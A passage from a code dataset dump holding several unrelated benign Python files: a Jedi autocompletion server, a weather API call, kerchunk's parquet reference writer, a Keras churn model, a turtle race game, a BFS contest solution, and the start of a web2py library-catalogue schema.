self._serialize_tooltip(script.goto_definitions(), request['id'])\n except:\n return json.dumps({'id': request['id'], 'results': []})\n elif lookup == 'arguments':\n return self._serialize_arguments(\n script, request['id'])\n elif lookup == 'usages':\n return self._serialize_usages(\n script.usages(), request['id'])\n elif lookup == 'methods':\n return self._serialize_methods(script, request['id'],\n request.get('prefix', ''))\n else:\n return self._serialize_completions(script, request['id'],\n request.get('prefix', ''))\n\n def _write_response(self, response):\n sys.stdout.write(response + '\\n')\n sys.stdout.flush()\n\n def watch(self):\n while True:\n try:\n rq = self._input.readline()\n if len(rq) == 0:\n # Reached EOF - indication our parent process is gone.\n sys.stderr.write('Received EOF from the standard input,exiting' + '\\n')\n sys.stderr.flush()\n return\n with RedirectStdout():\n response = self._process_request(rq)\n self._write_response(response)\n\n except Exception:\n sys.stderr.write(traceback.format_exc() + '\\n')\n sys.stderr.flush()\n\nif __name__ == '__main__':\n cachePrefix = 'v'\n modulesToLoad = ''\n if len(sys.argv) > 2 and sys.argv[1] == 'custom':\n jediPath = sys.argv[2]\n jediPreview = True\n cachePrefix = 'custom_v'\n if len(sys.argv) > 3:\n modulesToLoad = sys.argv[3]\n else:\n #release\n jediPath = os.path.dirname(__file__)\n if len(sys.argv) > 1:\n modulesToLoad = sys.argv[1]\n\n sys.path.insert(0, jediPath)\n import jedi\n if jediPreview:\n jedi.settings.cache_directory = os.path.join(\n jedi.settings.cache_directory, cachePrefix + jedi.__version__.replace('.', ''))\n # remove jedi from path after we import it so it will not be completed\n sys.path.pop(0)\n if len(modulesToLoad) > 0:\n jedi.preload_module(*modulesToLoad.split(','))\n JediCompletion().watch()\n","repo_name":"facebookarchive/nuclide","sub_path":"modules/atom-ide-debugger-python/VendorLib/vs-py-debugger/pythonFiles/completion.py","file_name":"completion.py","file_ext":"py","file_size_in_byte":25230,"program_lang":"python","lang":"en","doc_type":"code","stars":7820,"dataset":"github-code","pt":"75"} +{"seq_id":"22996908789","text":"import my_notebooks.modules.api_keys as api_keys\nimport requests\n\nurl = \"http://api.openweathermap.org/data/2.5/weather\"\nquery = {\n \"q\": \"Aarhus,dk\",\n \"mode\": \"json\",\n \"units\": \"metric\",\n \"appid\": api_keys.OPENWEATHERMAP\n}\n\nr = requests.get(url, params=query)\n\nprint(r.json())\n","repo_name":"KD131/sem4-python-notebooks","sub_path":"week6/openweather.py","file_name":"openweather.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22902543587","text":"import base64\n\nimport pandas as pd\nimport fsspec\n\nfrom kerchunk.utils import templateize\n\n# example from preffs's README'\ndf = pd.DataFrame(\n {\n \"key\": [\"a/b\", \"a/b\", \"b\"],\n \"path\": [\"a.dat\", \"b.dat\", None],\n \"offset\": [123, 12, 0],\n \"size\": [12, 17, 0],\n \"raw\": [None, None, b\"data\"],\n }\n)\n\n\ndef _proc_raw(r):\n if not isinstance(r, bytes):\n r = r.encode()\n if r.startswith(b\"base64:\"):\n return base64.b64decode(r[7:])\n return r\n\n\ndef refs_to_dataframe(\n refs,\n url,\n storage_options=None,\n partition=False,\n template_length=10,\n dict_fraction=0.1,\n min_refs=100,\n):\n \"\"\"Transform JSON/dict references to parquet storage\n\n This function should produce much smaller on-disk size for any large reference set,\n and much better memory footprint when loaded wih fsspec's DFReferenceFileSystem.\n\n Parameters\n ----------\n refs: str | dict\n Location of a JSON file containing references or a reference set already loaded\n into memory. It will get processed by the standard referenceFS, to normalise\n any templates, etc., it might contain.\n url: str\n Location for the output, together with protocol. If partition=True, this must\n be a writable directory.\n storage_options: dict | None\n Passed to fsspec when for writing the parquet.\n partition: bool\n If True, split out the references into \"metadata\" and separate files for each of\n the variables within the output directory.\n template_length: int\n Controls replacing a common prefix amongst reference URLs. If non-zero (in which\n case no templating is done), finds and replaces the common prefix to URLs within\n an output file (see :func:`kerchunk.utils.templateize`). If the URLs are\n dict encoded, this step is not attempted.\n dict_fraction: float\n Use categorical/dict encoding if the number of unique URLs / total number of URLs\n is is smaller than this number.\n min_refs: int\n If any variables have fewer entries than this number, they will be included in\n \"metadata\" - this is typically the coordinates that you want loaded immediately\n upon opening a dataset anyway. Ignored if partition is False.\n \"\"\"\n # normalise refs (e.g., for templates)\n fs = fsspec.filesystem(\"reference\", fo=refs)\n refs = fs.references\n\n df = pd.DataFrame(\n {\n \"key\": list(refs),\n # TODO: could get unique values using set() here and make categorical\n # columns with pd.Categorical.from_codes if it meets criterion\n \"path\": [r[0] if isinstance(r, list) else None for r in refs.values()],\n \"offset\": [\n r[1] if isinstance(r, list) and len(r) > 1 else 0 for r in refs.values()\n ],\n \"size\": pd.Series(\n [\n r[2] if isinstance(r, list) and len(r) > 1 else 0\n for r in refs.values()\n ],\n dtype=\"int32\",\n ),\n \"raw\": [\n _proc_raw(r) if not isinstance(r, list) else None for r in refs.values()\n ],\n }\n )\n # recoup memory\n fs.clear_instance_cache()\n del fs, refs\n\n if partition is False:\n templates = None\n haspath = ~df[\"path\"].isna()\n nhaspath = haspath.sum()\n if (\n dict_fraction\n and nhaspath\n and (df[\"path\"][haspath].nunique() / haspath.sum()) < dict_fraction\n ):\n df[\"path\"] = df[\"path\"].astype(\"category\")\n elif template_length:\n templates, urls = templateize(\n df[\"path\"][haspath], min_length=template_length\n )\n df.loc[haspath, \"path\"] = urls\n df.to_parquet(\n url,\n storage_options=storage_options,\n index=False,\n object_encoding={\"raw\": \"bytes\", \"key\": \"utf8\", \"path\": \"utf8\"},\n stats=[\"key\"],\n has_nulls=[\"path\", \"raw\"],\n compression=\"zstd\",\n engine=\"fastparquet\",\n custom_metadata=templates or None,\n )\n else:\n ismeta = df.key.str.contains(\".z\")\n extra_inds = []\n gb = df[~ismeta].groupby(df.key.map(lambda s: s.split(\"/\", 1)[0]))\n prefs = {\"metadata\"}\n for prefix, subdf in gb:\n if len(subdf) < min_refs:\n ind = ismeta[~ismeta].iloc[gb.indices[prefix]].index\n extra_inds.extend(ind.tolist())\n prefs.add(prefix)\n continue\n subdf[\"key\"] = subdf.key.str.slice(len(prefix) + 1, None)\n templates = None\n haspath = ~subdf[\"path\"].isna()\n nhaspath = haspath.sum()\n if (\n dict_fraction\n and nhaspath\n and (subdf[\"path\"][haspath].nunique() / haspath.sum()) < dict_fraction\n ):\n subdf[\"path\"] = subdf[\"path\"].astype(\"category\")\n elif template_length:\n templates, urls = templateize(\n subdf[\"path\"][haspath], min_length=template_length\n )\n subdf.loc[haspath, \"path\"] = urls\n\n subdf.to_parquet(\n f\"{url}/{prefix}.parq\",\n storage_options=storage_options,\n index=False,\n object_encoding={\"raw\": \"bytes\", \"key\": \"utf8\", \"path\": \"utf8\"},\n stats=[\"key\"],\n has_nulls=[\"path\", \"raw\"],\n compression=\"zstd\",\n engine=\"fastparquet\",\n custom_metadata=templates or None,\n )\n ismeta[extra_inds] = True\n df[ismeta].to_parquet(\n f\"{url}/metadata.parq\",\n storage_options=storage_options,\n index=False,\n object_encoding={\"raw\": \"bytes\", \"key\": \"utf8\", \"path\": \"utf8\"},\n stats=[\"key\"],\n has_nulls=[\"path\", \"raw\"],\n compression=\"zstd\",\n engine=\"fastparquet\",\n custom_metadata={\"prefs\": str(prefs)},\n )\n","repo_name":"dougiesquire/kerchunk","sub_path":"kerchunk/df.py","file_name":"df.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"19509167845","text":"import numpy as np\nimport pandas as pd\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.models import Sequential\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.compose import make_column_transformer\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import OneHotEncoder, LabelEncoder, StandardScaler\n\ndataset = pd.read_csv('Churn_Modelling.csv')\nX = dataset.iloc[:, 3:13].values\ny = dataset.iloc[:, 13].values\n\nlabelEncoderGender = LabelEncoder()\nX[:, 2] = labelEncoderGender.fit_transform(X[:, 2])\n\ncolumnTransformerCountry = make_column_transformer(\n (OneHotEncoder(categories='auto'), [1]),\n remainder='passthrough')\n\nX = columnTransformerCountry.fit_transform(X)\nX = X[:, 1:]\nX = X.astype(float)\nXtrain, XTest, yTrain, yTest = train_test_split(X, y, test_size=0.2, random_state=0)\n\nstandardScalerX = StandardScaler()\nXtrain = standardScalerX.fit_transform(Xtrain)\nXTest = standardScalerX.transform(XTest)\n\nclassifier = Sequential()\n\nclassifier.add(Dense(units=6, input_dim=11, kernel_initializer='uniform', activation='relu'))\nclassifier.add(Dropout(rate=0.1))\n\nclassifier.add(Dense(units=6, kernel_initializer='uniform', activation='relu'))\n\nclassifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\n\nclassifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\nclassifier.fit(Xtrain, yTrain, batch_size=10, epochs=100)\n\ny_pred = classifier.predict(XTest)\ny_pred = (y_pred > 0.5)\n\ncm = confusion_matrix(yTest, y_pred)\nprint(cm)\n\n\"\"\"Predict if the customer with the following informations will leave the bank:\nGeography: France\nCredit Score: 600\nGender: Male\nAge: 40\nTenure: 3\nBalance: 60000\nNumber of Products: 2\nHas Credit Card: Yes\nIs Active Member: Yes\nEstimated Salary: 50000\"\"\"\ncustomer1 = np.array([[600, 'France', 'Male', 40, 3, 60000, 2, 1, 1, 50000]])\ncustomer1[:, 2] = labelEncoderGender.transform(customer1[:, 2])\ncustomer1 = columnTransformerCountry.transform(customer1)\ncustomer1 = customer1[:, 1:]\ncustomer1 = customer1.astype(float)\ncustomer1 = standardScalerX.transform(customer1)\n\ncustomer1_pred = classifier.predict(customer1)\nprint(customer1_pred)\n\n'''\ndef buildClassifier():\n classifier = Sequential()\n classifier.add(Dense(units=6, input_dim=11, kernel_initializer='uniform', activation='relu'))\n classifier.add(Dense(units=6, kernel_initializer='uniform', activation='relu'))\n classifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\n classifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n return classifier\n\nclassifier = KerasClassifier(build_fn = buildClassifier, batch_size=10, epochs=100)\naccuracies = cross_val_score(estimator = classifier, X = Xtrain, y = yTrain, cv = 10, n_jobs = -1)\nmean = accuracies.mean()\nvariance = accuracies.std()\n'''\n\n\n\ndef buildClassifier(optimizer):\n classifier = Sequential()\n classifier.add(Dense(units=6, input_dim=11, kernel_initializer='uniform', activation='relu'))\n classifier.add(Dense(units=6, kernel_initializer='uniform', activation='relu'))\n classifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\n classifier.compile(optimizer = optimizer, loss='binary_crossentropy', metrics=['accuracy'])\n return classifier\n\nclassifier = KerasClassifier(build_fn = buildClassifier)\nparameters = {'batch_size': [25, 32],\n 'epochs': [100, 200, 500],\n 'optimizer': ['adam', 'rmsprop']}\n\ngridSearch = GridSearchCV(estimator = classifier, param_grid = parameters,\n scoring = 'accuracy', cv = 10, n_jobs = -1)\n\ngridSearch = gridSearch.fit(Xtrain, yTrain)\nbest_accuracy = gridSearch.best_score_\nbest_parameters = gridSearch.best_params_\nbest_estimator = gridSearch.best_estimator_\n\n","repo_name":"epm157/python-projects","sub_path":"Deep Learning/Volume 1 - Supervised Deep Learning/Part 1 - Artificial Neural Networks (ANN)/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16301105974","text":"import turtle as tur\nimport random as ran\nfrom tkinter import messagebox\nspd = 99999\ndef clean():\n pink = 0\n green = 0\n blue = 0\n red = 0\n purple = 0\n orange = 0\ndef mkboard(t1b,t2b,t3b,t4b,t5b,t6b,t1n,t2n,t3n,t4n,t5n,t6n):\n#_________________\\n\n#|1|{t1n}|{t1b}|\\n\n#|----------------\\n\n#|2|{t2n}|{t2b}|\\n\n#|---------------\\n\n#|3|{t3n}|{t3b}|\\n\n#|----------------\\n\n#|4|{t4n}|{t4b}|\\n\n#|----------------\\n\n#|5|{t5n}|{t5b}|\\n\n#|----------------\\n\n#|6|{t6n}|{t6b}|\\n\n#|----------------\\n\n#\n board = (f\"_________________\\n|1|{t1n}|{t1b}|\\n|----------------\\n|2|{t2n}|{t2b}|\\n|---------------\\n|3|{t3n}|{t3b}|\\n|----------------\\n|4|{t4n}|{t4b}|\\n|----------------\\n|5|{t5n}|{t5b}|\\n|----------------\\n|6|{t6n}|{t6b}|\\n|----------------\\n\")\n return board\ndef determper(ranum, personal, turtle, ranum2, rl):\n if int(turtle) == 1:\n if rl == 1:\n t1.right(ranum2)\n t1.forward(ranum)\n if rl == 2:\n t1.left(ranum2)\n t1.forward(ranum)\n elif int(turtle) == 2:\n if rl == 1:\n t2.right(ranum2)\n t2.forward(ranum)\n if rl == 2:\n t2.left(ranum2)\n t2.forward(ranum)\n elif int(turtle) == 3:\n if rl == 1:\n t3.right(ranum2)\n t3.forward(ranum)\n if rl == 2:\n t3.left(ranum2)\n t3.forward(ranum)\n elif int(turtle) == 4:\n if rl == 1:\n t4.right(ranum2)\n t4.forward(ranum)\n if rl == 2:\n t4.left(ranum2)\n t4.forward(ranum)\n elif int(turtle) == 5:\n if rl == 1:\n t5.right(ranum2)\n t5.forward(ranum)\n if rl == 2:\n t5.left(ranum2)\n t5.forward(ranum)\n elif int(turtle) == 6:\n if rl == 1:\n t6.right(ranum2)\n t6.forward(ranum)\n if rl == 2:\n t6.left(ranum2)\n t6.forward(ranum)\n \npink = 0\ngreen = 0\nblue = 0\nred = 0\npurple = 0\norange = 0\nstoreto = int(input(\"What score would you like the turtles to go too?\\n\"))\nwhile True:\n tur.speed(100)\n tur.setheading(0)\n tur.goto(0,0)\n print(\"start\")\n tur.up()\n #tur.left(90)\n tur.forward(200)\n tur.right(90)\n tur.down()\n tur.forward(125)\n tur.right(90)\n tur.up()\n tur.forward(400)\n tur.down()\n tur.right(90)\n tur.forward(125)\n tur.right(90)\n tur.up()\n tur.forward(200)\n tur.right(90)\n tur.forward(125/2)\n tur.right(90)\n tur.up()\n tur.goto(900,900)\n\n ##line##\n\n t1 = tur.Turtle()\n t1.speed(100)\n t1.up()\n t1.forward(200)\n t1.right(90)\n forw = 100/6\n t1.forward(forw)\n t1.right(90)\n t1.down()\n\n ##t2##\n\n t2 = tur.Turtle()\n t2.speed(100)\n t2.up()\n t2.forward(200)\n t2.right(90)\n forw = 100/6\n t2.forward(forw+forw)\n t2.right(90)\n t2.down()\n\n ##t3##\n\n t3 = tur.Turtle()\n t3.speed(100)\n t3.up()\n t3.forward(200)\n t3.right(90)\n forw = 100/6\n t3.forward(forw+forw+forw)\n t3.right(90)\n t3.down()\n\n ##t4##\n\n t4 = tur.Turtle()\n t4.speed(100)\n t4.up()\n t4.forward(200)\n t4.right(90)\n forw = 100/6\n t4.forward(forw+forw+forw+forw)\n t4.right(90)\n t4.down()\n\n ##t5##\n\n t5 = tur.Turtle()\n t5.speed(100)\n t5.up()\n t5.forward(200)\n t5.right(90)\n forw = 100/6\n t5.forward(forw+forw+forw+forw+forw)\n t5.right(90)\n t5.down()\n\n ##t6##\n\n t6 = tur.Turtle()\n t6.speed(100)\n t6.up()\n t6.forward(200)\n t6.right(90)\n f6rw = 100/6\n t6.forward(forw+forw+forw+forw+forw+forw)\n t6.right(90)\n t6.down()\n\n ##racing##\n game = 1\n cpos1 = 0\n cpos2 = 0\n cpos3 = 0\n cpos4 = 0\n cpos5 = 0\n cpos6 = 0\n t1.color(\"pink\")\n t2.color(\"green\")\n t3.color(\"blue\")\n t4.color(\"red\")\n t5.color(\"purple\")\n t6.color(\"orange\")\n t1.speed(spd)\n t2.speed(spd)\n t3.speed(spd)\n t4.speed(spd)\n t5.speed(spd)\n t6.speed(spd)\n while game == 1:\n random1 = ran.randint(1,20)\n random2 = ran.randint(1,20)\n random3 = ran.randint(1,20)\n random4 = ran.randint(1,20)\n random5 = ran.randint(1,20)\n random6 = ran.randint(1,20)\n person = ran.randint(0,2)\n rl = ran.randint(1,2)\n determper(random1, person, 1, person, rl)\n #print(\"1\")\n person = ran.randint(0,2)\n rl = ran.randint(1,2)\n determper(random2, person, 2, person, rl)\n #print(\"2\")\n person = ran.randint(0,2)\n rl = ran.randint(1,2)\n determper(random3, person, 3, person, rl)\n #print(\"3\")\n person = ran.randint(0,2)\n rl = ran.randint(1,2)\n determper(random4, person, 4, person, rl)\n #print(\"4\")\n person = ran.randint(0,2)\n rl = ran.randint(1,2)\n determper(random5, person, 5, person, rl)\n #print(\"5\")\n person = ran.randint(0,2)\n rl = ran.randint(1,2)\n determper(random6, person, 6, person, rl)\n #print(\"6\")\n #print(\"ck1\")\n cpos1 = t1.xcor()\n cpos2 = t2.xcor()\n cpos3 = t3.xcor()\n cpos4 = t4.xcor()\n cpos5 = t5.xcor()\n cpos6 = t6.xcor()\n #print(\"ck2\")\n #import os\n #os.system(\"clear\")\n numbert = -200\n numbert = float(numbert)\n if float(round(t1.xcor())) <= numbert or float(round(t2.xcor())) <= numbert or float(round(t3.xcor())) <= numbert or float(round(t4.xcor())) <= numbert or float(round(t5.xcor())) <= numbert or float(round(t6.xcor())) <= numbert:\n winners = ['','','','','','']\n winners[0] = cpos1\n winners[1] = cpos2\n winners[2] = cpos3\n winners[3] = cpos4\n winners[4] = cpos5\n winners[5] = cpos6\n winners.sort()\n count = -1\n winatlis = ['','','','','','']\n for x in winners:\n count = count+1\n if x == cpos1:\n winatlis[count] = \"pink\"\n if x == cpos2:\n winatlis[count] = \"green\"\n if x == cpos3:\n winatlis[count] = \"blue\"\n if x == cpos4:\n winatlis[count] = \"red\"\n if x == cpos5:\n winatlis[count] = \"purple\"\n if x == cpos6:\n winatlis[count] = \"orange\"\n if winatlis[0] == \"pink\":\n pink = pink+1\n if winatlis[0] == \"green\":\n green = green+1\n if winatlis[0] == \"blue\":\n blue = blue+1\n if winatlis[0] == \"red\":\n red = red+1\n if winatlis[0] == \"purple\":\n purple = purple+1\n if winatlis[0] == \"orange\":\n orange = orange+1\n if int(pink) == int(storeto) or int(green) == int(storeto) or int(blue) == int(storeto) or int(red) == int(storeto) or int(purple) == int(storeto) or int(orange) == int(storeto):\n wincol = []\n wincol.append(pink)\n wincol.append(green)\n wincol.append(blue)\n wincol.append(red)\n wincol.append(purple)\n wincol.append(orange)\n wincol.sort()\n wincolatlis = []\n for x in wincol:\n if x == pink:\n wincolatlis.append(\"Pink\")\n if x == green:\n wincolatlis.append(\"Green\")\n if x == blue:\n wincolatlis.append(\"Blue\")\n if x == red:\n wincolatlis.append(\"Red\")\n if x == purple:\n wincolatlis.append(\"Purple\")\n if x == orange:\n wincolatlis.append(\"Orange\")\n \n messagebox.showinfo('information', mkboard(wincol[0],wincol[1],wincol[2],wincol[3],wincol[4],wincol[5],wincolatlis[0],wincolatlis[1],wincolatlis[2],wincolatlis[3],wincolatlis[4],wincolatlis[5]))\n yn = messagebox.askyesno('Play again?', 'Play again?')\n if yn == True:\n tur.reset()\n t1.reset()\n t2.reset()\n t3.reset()\n t4.reset()\n t5.reset()\n t6.reset()\n t1.up()\n t2.up()\n t3.up()\n t4.up()\n t5.up()\n t6.up()\n break\n if yn == False:\n exit()\n else:\n tur.reset()\n t1.reset()\n t2.reset()\n t3.reset()\n t4.reset()\n t5.reset()\n t6.reset()\n t1.up()\n t2.up()\n t3.up()\n t4.up()\n t5.up()\n t6.up()\n break\n","repo_name":"Duedot43/PythonProgramsForHS","sub_path":"Python/Unit 5/turtle_racev2.py","file_name":"turtle_racev2.py","file_ext":"py","file_size_in_byte":9047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10793632326","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\nINF = int(1e9)\ndef bfs(start, k):\n global graph\n visited = [False] * (N+1)\n q = deque()\n q.append(start)\n count = 0\n while q:\n now = q.popleft()\n visited[now] = True\n for n_n, w in graph[now]:\n if not visited[n_n] and w >= k:\n q.append(n_n)\n count += 1\n return count\nN, Q = map(int, input().split())\ngraph = [[] for _ in range(N+1)]\nfor _ in range(N-1):\n a, b, c = map(int, input().split())\n graph[a].append((b, c))\n graph[b].append((a, c))\n\nfor _ in range(Q):\n k, v = map(int, input().split())\n print(bfs(v, k))\n\n# import sys\n# input = sys.stdin.readline\n# INF = float('INF')\n\n# # bfs 함수\n\n\n# def bfs(v):\n# q = [(v, INF)] # v번 동영상부터 시작\n# visited = [False for _ in range(N+1)] # 이번 bfs에서 방문 여부 체크\n# visited[v] = True\n\n# while q:\n# nv, u = q.pop(0) # nv: 다음 동영상, u: usado\n\n# # next: nv번 동영상과 연결된 다음 동영상, nextU: nv번 동영상과 next번 동영상의 usado\n# for (next, nextU) in path[nv]:\n# if visited[next]: # 이미 방문한 동영상일 경우 continue\n# continue\n\n# nextUsado = min(u, nextU) # 현재까지 연결들의 최솟값을 기록\n# q.append((next, nextUsado))\n# # usado리스트에 v번 동영상부터 next번 동영상까지의 usado 최솟값 기록\n# usado[v][next] = nextUsado\n# visited[next] = True # next번 동영상의 방문 여부 갱신\n\n\n# if __name__ == '__main__':\n# N, Q = map(int, input().split()) # N: 동영상의 개수, Q: 질문의 개수\n# check = [False for _ in range(N+1)] # n번 동영상 bfs 여부\n# usado = [[0 for _ in range(N+1)]\n# for _ in range(N+1)] # n번 동영상의 각 동영상에 대한 usado 기록\n# path = [[] for _ in range(N+1)] # 입력으로 주어지는 두 동영상 쌍의 usado\n\n# for _ in range(N-1):\n# p, q, r = map(int, input().split()) # 동영상 p, q와 usado에 해당하는 r\n# path[p].append((q, r)) # path에 usado 기록\n# path[q].append((p, r))\n\n# for _ in range(Q):\n# k, v = map(int, input().split()) # k: usado 기준, v: 동영상 번호\n\n# if check[v]: # 이미 bfs를 진행한 동영상이라면\n# print(len([x for x in usado[v] if x >= k])) # 바로 k 이상의 동영상 개수를 찾는다\n# continue\n\n# check[v] = True # bfs를 진행했음을 기록하고\n# bfs(v) # 동영상 v에 대하여 bfs 진행\n# print(len([x for x in usado[v] if x >= k])) # k 이상의 동영상 개수를 찾는다\n\n# # from collections import defaultdict, deque\n\n# # def find_video(start_n, k, map_dict):\n# # queue = deque()\n# # queue.append((start_n, float('inf')))\n# # visit_list = [-1] * N\n# # visit_list[start_n] = 1\n# # count = 0\n\n# # while queue:\n# # pop_node, min_dist = queue.popleft()\n# # for next_n, dist in map_dict[pop_node]:\n# # if visit_list[next_n] == 1: continue\n# # if min_dist > dist:\n# # queue.append((next_n, dist))\n# # if dist >= k: count += 1\n# # else:\n# # queue.append((next_n, min_dist))\n# # if min_dist >= k: count += 1\n# # visit_list[next_n] = 1\n\n# # return count\n\n# # N, Q = map(int, input().split())\n# # map_dict = defaultdict(list)\n# # for _ in range(N-1):\n# # p, q, r = map(int, input().split())\n# # map_dict[p-1].append((q-1, r))\n# # map_dict[q-1].append((p-1, r))\n# # for _ in range(Q):\n# # k, v = map(int, input().split())\n# # print(find_video(v-1, k, map_dict))","repo_name":"hyunjinee/Algorithm","sub_path":"solved.ac/python/15591.py","file_name":"15591.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"75"} +{"seq_id":"41299585390","text":"# -*- coding: utf-8 -*-\n\nfrom itertools import groupby\n\nfrom global_settings import DEFAULT_CURRENCY, SUPPORTED_CURRENCIES, TESTING_LIB_ID\nfrom c_db import PublLengths\n\n\nauth.settings.create_user_groups = None\ncurrent.auth = auth\n\n# TODO: přidej Objednávku do HACTIONS: bude zřejmě vyžadovat extra tabulku jen částečně zpracovaných knih\nHACTIONS = (('+o', T(\"zaevidován zpětně\")), ('+g', T(\"získán jako dar\")), ('+n', T(\"zaevidován - nový nákup\")),\n ('--', T(\"vyřazen (bez dalších podrobností)\")),\n ('-d', T(\"vyřazen (likvidován)\")), ('-b', T(\"předán ke svázání (vyřazen)\")),\n ('-g', T(\"vyřazen (darován)\")), ('-n', T(\"odprodán\")), ('-?', T(\"nezvěstný vyřazen\")),\n ('+f', T(\"cizí dočasně zařazen (zapůjčený výtisk)\")), ('-f', T(\"zapůjčený cizí vyřazen (vrácen zpět - odevzdán)\")),\n ('o+', T(\"náš zapůjčený zařazen (byl vrácen zpět)\")), ('o-', T(\"náš dočasně vyřazen (zapůjčen - předán)\")),\n ('l+', T(\"vrácen\")), ('l-', T(\"vypůjčen\")),\n ('l!', T(\"upomínka\")), ('ll', T(\"prodloužen vzdáleně\")), ('lL', T(\"prodloužen fyzicky\")),\n ('r*', T(\"revidován\")), ('r?', T(\"označen jako nezvěstný\")),\n ) # 'r?' status of the impression is active if 'r?' is the last item in the impr_hist\nHACTIONS_IN = tuple(filter(lambda ha: ha[0][0] == '+', HACTIONS))\nHACTIONS_OUT = tuple(filter(lambda ha: ha[0][0] == '-', HACTIONS))\nHACTIONS_MVS = (('+f', T(\"získali jsme cizí knihy odjinud\")),\n ('-f', T(\"vrátili jsme cizí knihy\")),\n ('o-', T(\"zapůjčili jsme naše knihy jinam\")),\n ('o+', T(\"vrátily se nám naše knihy\")))\nHACTIONS_MVS_HINT = (('+f', T(\"cizí knihy dočasně získávám (současně označte Příjem)\")),\n ('-f', T(\"cizí knihy vracím zpět - odevzdávám\")),\n ('o-', T(\"naše knihy zapůjčuji - předávám\")),\n ('o+', T(\"naše knihy se vrátily - zařazuji je zpět (je doporučeno označit Příjem)\")))\ndtformat = T('%d.%m.%Y %H:%M', lazy=False)\n\n\"\"\"deaktivovano\nclass UNIQUE_QUESTION(object):\n def __init__(self, error_message=T('dotaz už je ve frontě')):\n self.error_message = error_message\n def __call__(self, value):\n if db((db.question.question == value) & (db.question.auth_user_id == auth.user_id) & (db.question.live == True)\n ).select(db.question.id, limitby=(0, 1)):\n return (value, self.error_message)\n else:\n return (value, None)\n\"\"\"\n\nLIBRARY_TYPES = (('tst', T(\"jen pro odzkoušení\")), ('per', T(\"osobní knihovna\")), # testing as first!\n ('pub', T(\"veřejná knihovna\")), ('sch', T(\"školní knihovna\")),\n ('pri', T(\"knihovna firmy nebo instituce\")), ('ant', T(\"antkvariát\")),\n ('bsr', T(\"knihkupec\")), ('bsd', T(\"knižní velkoobchod, distribuce\")), ('plr', T(\"nakladatel\")),\n ('oth', T(\"jiné, nelze zařadit\")),\n )\nIMPORT_SOURCES = (('codex', T(\"codex/DOS\")),) # key is used in URL, use proper characters (but we do encode it)\n\ndb.define_table('library',\n Field('library', 'string', length=128, requires=[IS_NOT_EMPTY(), IS_NOT_IN_DB(db, 'library.library')],\n label=T(\"Jméno knihovny\"), comment=T(\"nejedná-li se o oficiální titul knihovny, neuvádějte zde její typ; pro osobní knihovnu zadejte např. Petr Starý, Kladno\")),\n Field('slug', 'string', length=32,\n requires=[IS_NOT_EMPTY(), IS_NOT_IN_DB(db, 'library.slug')],\n label=T(\"URL jméno\"), comment=T(\"jméno do URL adresy [malá písmena, číslice, pomlčka/podtržítko] (příklad: petr_stary_kladno)\")),\n Field('is_public', 'boolean', default=True,\n label=T(\"Veřejně přístupný katalog\")),\n Field('news_cnt', 'integer', default=30,\n label=T(\"Počet zobrazených novinek\"), comment=T(\"0..nezobrazovat, >0..počet titulů\")),\n Field('street', 'string', length=48,\n label=T(\"Ulice\"), comment=T(\"ulice (nepovinné)\")),\n Field('city', 'string', length=48,\n label=T(\"Místo\"), comment=T(\"město nebo obec\")),\n Field('plz', 'string', length=8,\n label=T(\"PSČ\"), comment=T(\"poštovní směrovací číslo obce\")),\n Field('ltype', 'string', length=3, default=LIBRARY_TYPES[0][0],\n notnull=True, requires=IS_IN_SET(LIBRARY_TYPES),\n label=T(\"Typ knihovny\"), comment=T(\"typ knihovny\")),\n Field('src_quality', 'integer', default=30, writable=False,\n label=T(\"Kvalita zdroje\"), comment=T(\"kvalita zdroje [%]\")),\n Field('old_system', 'string', length=48,\n label=T(\"Jiný systém\"), comment=T(\"předchozí nebo hlavní evidenční knihovnický systém\")),\n Field('imp_system', 'string', length=18,\n requires=IS_EMPTY_OR(IS_IN_SET(IMPORT_SOURCES)),\n label=T(\"Importovat z ..\"), comment=T(\"(pro import z dosud nepodporovaného zdroje kontaktujte administrátora)\")),\n Field('created', 'datetime', default=datetime.datetime.utcnow(),\n notnull=True, writable=False,\n label=T(\"Vytvořeno\"), comment=T(\"čas vytvoření evidence\")),\n Field('completed', 'date',\n label=T(\"Dokončeno\"), comment=T(\"datum dokončení zápisu fondu knihovny\")),\n Field('review_date', 'date', default=datetime.date.today(),\n notnull=True, requires=[IS_NOT_EMPTY(), IS_DATE(format=T('%d.%m.%Y'))],\n label=T(\"Zahájení revize\"), comment=T(\"den zahájení revize (vypíší se výtisky, nenalezené od tohoto data)\")),\n Field('st_imp_id', 'boolean', notnull=True, default=False, # libstyle['id'][0] = I\n label=T(\"Přír.číslo ?\"), comment=T(\"označte, pokud knihovna používá přírůstková čísla výtisků\")),\n Field('st_imp_idx', 'integer', notnull=True, default=1, # libstyle['id'][1] = 0|1|2|.. which number-part of ID should be incremented\n label=T(\"Typ inkrementování\"), comment=T(\"0 nezvětšovat přír.číslo; 1 zvětšovat resp. zvětšovat první nalezené číslo; 2 zvětšovat druhé nalezené podčíslo (např. při stylu: rok/číslo)\")),\n Field('st_imp_ord', 'boolean', notnull=True, default=False, # libstyle['id'][2] = O\n label=T(\"Čís.výtisku ?\"), comment=T(\"označte, pokud se má zobrazovat číslo výtisku jako rozlišení výtisků každé publikace\")),\n Field('st_imp_rik', 'integer', # 